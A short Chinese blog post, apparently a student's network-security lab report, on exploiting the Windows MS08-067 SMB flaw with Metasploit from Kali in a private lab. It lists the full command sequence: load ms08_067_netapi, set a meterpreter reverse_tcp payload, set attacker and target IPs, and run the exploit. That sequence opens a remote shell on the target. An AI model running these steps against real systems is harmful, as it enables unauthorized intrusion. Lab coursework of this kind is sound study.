20169210 2016-2017-2《网络攻防实践》第十三周攻击MS08-067漏洞

利用MS08-067漏洞在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。
在Kali用命令 msfconsole 开启Metasploit (在终端里输入msfconsole

然后运行命令:

use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序

set payload windows/meterpreter/reverse_tcp #设置payload

show options #查看设置信息

set LHOST 192.168.116.3 #设置本地主机IP

set RHOST 192.168.116.116 #设置目标主机IP

exploit #实施攻击

攻击成功如下图所示

posted @ 2017-05-24 16:57  刘翠杰  阅读(193)  评论(0编辑  收藏  举报